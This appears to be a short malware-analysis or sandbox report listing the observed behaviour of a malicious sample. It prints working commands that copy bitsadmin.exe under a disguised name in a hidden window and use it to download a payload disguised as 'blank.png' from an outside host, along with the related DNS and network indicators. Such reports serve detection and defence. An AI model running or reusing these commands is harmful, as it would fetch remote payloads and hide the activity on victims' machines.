Technical Information
- '%APPDATA%\cjdu.exe' /transfer WTaQVA /download https://greytinfo.com/earlgrey/01020310155/blank.png %APPDATA%\blank.png
- %APPDATA%\cjdu.exe
- 'gr###info.com':443
- DNS ASK gr###info.com
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\CjDU.exe (with hidden window)
- '%APPDATA%\cjdu.exe' /transfer WTaQVA /download https://greytinfo.com/earlgrey/01020310155/blank.png %APPDATA%\blank.png (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\CjDU.exe